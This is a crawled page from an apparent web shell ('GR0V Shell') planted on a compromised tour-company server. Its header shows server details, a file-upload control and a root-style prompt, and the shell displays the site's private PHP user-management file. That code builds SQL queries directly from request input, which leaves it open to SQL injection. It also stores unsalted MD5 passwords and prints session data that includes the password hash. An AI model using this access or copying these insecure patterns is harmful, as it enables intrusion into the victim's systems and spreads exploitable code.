? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/public_html/modules-bak/blog/
File Upload :
Current File : /home/admin/public_html/modules-bak/blog/mod_user.php

<?
class user extends MySql
{
	function Access($module){
				global $user_login;
				$module=strtolower($module);
				if($user_login['Access']=='Administrator'){
					return true;
				}
				 if($user_login['Login_Status']!='True'){
						return false;
				 }
				 $this->Query("SELECT * FROM modules WHERE module_name='".$module."'  AND usertype_access_id='".$user_login['Type']."'");
				$numRow=$this->numRows();
			 if($numRow==0){
						return false;
			 }
						return true;

	}

	function Initial()
		{
		global $user_login;
		$client_ip=getClientIp();
		$SessionID=md5($this->getSessionID());
		$current_time=time();
		if($user_login['Login_Status']!=true){$su="Guest";}else{$su=$user_login['Login'];}
		$time=time()-21600000;
		$this->setQuery("DELETE FROM session  WHERE session_time<$time");
		$this->freeQuery();
		$this->setQuery("SELECT * FROM session  WHERE session_ip='$client_ip' AND session_user='$su'");
		$this->QueryReturn();
		if($this->numRows()==0){
			$useronline=array(
			'ip'=>getClientIp(),
			'user'=>$su,
			'time'=>time(),
			'url'=>$_SERVER['QUERY_STRING']
			);
		$this->Insert('useronline',$useronline);
		$this->setQuery("INSERT INTO session  (session_id,session_time,session_ip,session_user) VALUES ('$SessionID','$current_time','$client_ip','$su')");
		//$user['s_uid']=$SessionID;
			if(!$this->QueryReturn()){
				Error($this->mysqlError());}
					}
		}//end function user

		function getSessionID(){
	mt_srand ((double) microtime() * 1000000);
	$pass_len = mt_rand (20,40);
	$allchar = "abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLNMOPQRSTUVWXYZ0123456789";
	$str = "" ;
	for ( $i = 0; $i<$pass_len ; $i++ ){
		$str .= substr( $allchar, mt_rand (0,62), 1 ) ;
	}
	$timestamp= time();
	$str=$str.$timestamp;
	return($str);
}

function login($UserNameLogin,$UserPasswordLogin)
	{
				global $user_login;
				$md5Pass=md5($UserPasswordLogin);
				//$md5Pass=$UserPasswordLogin;
				$this->setQuery("SELECT * FROM users where user_login= '$UserNameLogin' AND user_password = '$md5Pass'");
				//print_r($this);
				$result=$this->QueryReturn();

				if($this->numRows()==""){
					echo "<script>jAlert('Username or Password INCORRECT', 'Login Error');</script>";
					exit();
				}else{
					$arr=mysql_fetch_array($result);

				$this->setQuery("SELECT * FROM user_profile where user_id= '{$arr['user_id']}'");
				$result2=$this->QueryReturn();
				$arr2=mysql_fetch_array($result2);

						/*if($arr['user_block']=='Yes'){
								$error="Access Denine";
								echo "<script>jAlert('Access Denine', 'Error');</script>";
								exit();
						}
						if($arr['user_type']!='1'){
								$error="Admin Only";
								echo "<script>jAlert('Admin Only', 'Error');</script>";
								exit();
						}*/

						//$_IpLogin=getClientIp();

						$_SESSION["user_login"]['ID']           =$arr['user_id'];
						$_SESSION["user_login"]['Login_Status'] ="True";
						$_SESSION["user_login"]['Login']        =$arr['user_login'];
						$_SESSION["user_login"]['Password']     =$arr['user_password'];
						$_SESSION["user_login"]['Type']         =$arr['user_type'];
						$_SESSION["user_login"]['Nickname']     =$arr2['nickname'];
						$_SESSION["user_login"]['Name']         =$arr['user_name'];
print_r($_SESSION["user_login"]);
						//$user_login['Group_Root']=$this->getRootParent($arr['user_type']);
						//$access=$this->getDataOneRow('usertype',$arr['user_type'],'usertype_id');
						//$user_login['Access']=$access['usertype_name'];
						$this->setQuery("UPDATE users SET user_last_visit_time='".time()."' WHERE user_login='".$arr['user_login']."'");
						$this->freeQuery();
						$this->setQuery("UPDATE users SET user_last_login_ip='".getClientIp()."' WHERE user_login='".$arr['user_login']."'");
						$this->freeQuery();
						//$this->setQuery("UPDATE session set session_user='$UserNameLogin' where session_ip='$_IpLogin'");
						//$this->freeQuery();
						echo"<meta http-equiv=\"refresh\" content=\"0;url=admin.php\">";
						//header("Location:index1.php");
				}
		}//end function login
function getRootParent($group){
			$parent=$this->getRow('usertype',"WHERE usertype_id='$group'");
			if($parent['usertype_parent']!=''){
				 $root=$this->getRootParent($parent['usertype_parent']);
			}else{
				return $parent['usertype_id'];
			}
return $root;
}
function logout()
	{
			global $user_login;
			//$_IpLogin=getClientIp();
			//$this->setQuery("DELETE FROM session  where session_user='".$user_login['Login']."'");
			//$this->QueryReturn();
						session_start();
						session_destroy();
						echo"<meta http-equiv=\"refresh\" content=\"0;url=index.php\">";
						//header("Location:index1.php");
	}//end function logout

function add_new_account(){
$data=Array(
	'user_login'=>$_POST['username'],
	'user_password'=>md5($_POST['password']),
	'user_name'=>$_POST['name'],
	'user_type'=>$_POST['cat_id'],
);
	$chk_user=$this->check_data($table='users',$field='user_login',$_POST['username']);
	//$this->Query("SELECT name,lastname FROM user_profile  WHERE  name='".$_POST['name']."' AND lastname='".$_POST['lastname']."'");
	//$chk_name_lastname=$this->numRows();
//	$chk_email=$this->check_data($table='users',$field='user_email',$_POST['email']);
if($chk_user==1){
	echo "<SCRIPT>alert('Username is ready to use'); window.history.back(); </SCRIPT>\n";
	exit();
}
/*if($chk_name_lastname==1){
	echo "<SCRIPT>alert('ชื่อ-นามสกุล ".$_POST['name']."  ".$_POST['lastname']." นี้มีในระบบแล้ว'); window.history.back(); </SCRIPT>\n";
	exit();
}*/
/*
if($chk_email==1){
	echo "<SCRIPT>alert('Email is ready to use'); window.history.back(); </SCRIPT>\n";
	exit();
}
*/
if($_POST['password']!=$_POST['password2']){
	echo "<SCRIPT>alert('รหัสผ่านไม่ตรงกัน'); window.history.back(); </SCRIPT>\n";
	exit();
}
if($_POST['name']!=''&&$_POST['username']!=''&&$_POST['cat_id']!=''&&$_POST['password']==$_POST['password2']){
if($this->Insert('users',$data)){
/*			$new_name=$_POST['username'];
		$picname=uploadfiles('photo',$new_name,$file_dir='../user_photo',$limit_size='100',$numfiles=1);

						if($picname[0]!=''){
									make_thumb($img="../user_photo/".$picname[0],$thumb_path='../user_photo/thumbs/'.$picname[0],$new_w=120);
								}
	$member=$this->getDataOneRow('users',$_POST['username'],'user_login');
	$data2=Array(
	'user_login'=>$picname[0],
	'user_password'=>$_POST['name'],
	'user_name'=>$_POST['lastname'],
		'user_email'=>$_POST['nickname'],
		'user_type'=>$_POST['day'],
		'user_block'=>$_POST['month'],
		'user_unlock'=>$_POST['year'],
		'user_add_time'=>$_POST['gender'],
		'user_add_time'=>$_POST['address'],
		'user_last_login_ip'=>$_POST['road'],
	);
	$this->Insert('user_profile',$data2);*/
echo"<meta http-equiv=\"refresh\" content=\"0;url=admin.php?mod=blog&msg=1\">";
}
else{
	echo"<meta http-equiv=\"refresh\" content=\"0;url=admin.php?mod=blog&msg=0\">";
}
}
else{
	echo "<SCRIPT>alert('Require Fields Data'); window.history.back(); </SCRIPT>\n";
	exit();

}
}//end new Account
function edit_user(){
//check_data_edit($table,$field,$data,$id_field,$id)
	$chk_user=$this->check_data_edit($table='users',$field='user_login',$_POST['username'],'user_id',$_POST['user_id']);
	$this->Query("SELECT name,lastname FROM user_profile  WHERE  user_id!='".$_POST['user_id']."' AND name='".$_POST['name']."' AND lastname='".$_POST['lastname']."'");
	$chk_name_lastname=$this->numRows();
//	$chk_email=$this->check_data_edit($table='users',$field='user_email',$_POST['email'],'user_id',$_POST['user_id']);
if($chk_user==1){
	echo "<SCRIPT>alert('Username is ready to use'); window.history.back(); </SCRIPT>\n";
	exit();
}

if($chk_name_lastname==1){
	echo "<SCRIPT>alert('ชื่อ-นามสกุล ".$_POST['name']."  ".$_POST['lastname']." นี้มีในระบบแล้ว'); window.history.back(); </SCRIPT>\n";
	exit();
}
/*
if($chk_email==1){
	echo "<SCRIPT>alert('Email is ready to use'); window.history.back(); </SCRIPT>\n";
	exit();
}
*/
if($_POST['password']!=''){

if($_POST['password']!=$_POST['repassword']){
	echo "<SCRIPT>alert('รหัสผ่านไม่ตรงกัน'); window.history.back(); </SCRIPT>\n";
	exit();
}else{
	$pass=md5($_POST['password']);
$this->Query("update users set user_password='$pass' where user_id='".$_POST['user_id']."'");
}
}//end check _POST['password']!=''
if($_POST['username']!=''){
	$data=Array(
	'user_login'=>$_POST['username'],
	'user_name'=>$_POST['name'],
	'user_email'=>$_POST['email1'],
	'user_type'=>$_POST['usertype'],
	'user_block'=>$_POST['block']
);
if($this->Update('users',$data,"where user_id='".$_POST['user_id']."'")){
	$chk=$this->check_data($table='user_profile',$field='user_id',$_POST['user_id']);

	$picname=uploadfiles('photo',$_POST['username'],$file_dir='../user_photo',$limit_size,$numfiles=1);
if($picname[0]==''){
	$picname[0]=$_POST['edit_photo'];
}else{
$img_src="../user_photo/".$picname[0];
make_thumb($img_src,'../user_photo/thumbs/'.$picname[0],150);
}
$data3=Array('photo'=>$picname[0]);
$this->Update('user_profile',$data3,"where user_id='".$_POST['user_id']."'");
	if($chk!=0){
		$data2=Array(
		'name'=>$_POST['name'],
		'lastname'=>$_POST['lastname'],
		'nickname'=>$_POST['nickname'],
		'day'=>$_POST['day'],
		'month'=>$_POST['month'],
		'year'=>$_POST['year'],
		'gender'=>$_POST['gender'],
		'address'=>$_POST['address'],
		'road'=>$_POST['road'],
		'sub_district'=>$_POST['sub_district'],
		'district'=>$_POST['district'],
		'province'=>$_POST['province'],
		'zipcode'=>$_POST['zipcode'],
		'telephone'=>$_POST['telephone'],
		'mobile'=>$_POST['mobile'],
		'email1'=>$_POST['email1'],
		'email2'=>$_POST['email2'],
		'job'=>$_POST['job'],
	);
$this->Update('user_profile',$data2,"where user_id='".$_POST['user_id']."'");
	}else{
						$data2=Array(
		'photo'=>$picname[0],
		'name'=>$_POST['name'],
		'lastname'=>$_POST['lastname'],
		'nickname'=>$_POST['nickname'],
		'day'=>$_POST['day'],
		'month'=>$_POST['month'],
		'year'=>$_POST['year'],
		'gender'=>$_POST['gender'],
		'address'=>$_POST['address'],
		'road'=>$_POST['road'],
		'sub_district'=>$_POST['sub_district'],
		'district'=>$_POST['district'],
		'province'=>$_POST['province'],
		'zipcode'=>$_POST['zipcode'],
		'telephone'=>$_POST['telephone'],
		'mobile'=>$_POST['mobile'],
		'email1'=>$_POST['email1'],
		'email2'=>$_POST['email2'],
		'job'=>$_POST['job'],
		'user_id'=>$_POST['user_id'],
	);
		$this->Insert('user_profile',$data2);
	}
	echo $picname[0];
echo"<meta http-equiv=\"refresh\" content=\"0;url=admin.php?mod=blog&msg=2\">";
}else{
echo $picname[0];
echo"<meta http-equiv=\"refresh\" content=\"0;url=admin.php?mod=blog&msg=6\">";
}
}else{
	echo "<SCRIPT>alert('Require Fields Data'); window.history.back(); </SCRIPT>\n";
	exit();
}
}//end edit user
function del_user(){
	global $user_login;
$user_id=$_GET['id'];
$chk_admin=$this->getDataOneRow('users',$user_id,'user_id');
/*if($chk_admin['user_type']==1){
	echo "<SCRIPT>alert('Cannot Delete Administator'); window.history.back(); </SCRIPT>\n";
	exit();
}*/
if($user_login['Type']==1){
$rs=$this->Query("delete from users where user_id='$user_id'");
if($rs){
	$this->Query("DELETE FROM user_profile WHERE user_id='$user_id'");
	echo"<meta http-equiv=\"refresh\" content=\"0;url=admin.php?mod=blog&msg=3\">";
	}else{
	echo"<meta http-equiv=\"refresh\" content=\"0;url=admin.php?mod=blog&msg=5\">";
}
}else{
echo"<meta http-equiv=\"refresh\" content=\"0;url=admin.php?mod=blog&msg=4\">";
}

}
		}//end class user


	?>

T1KUS90T
  root-grov@210.1.60.28:~$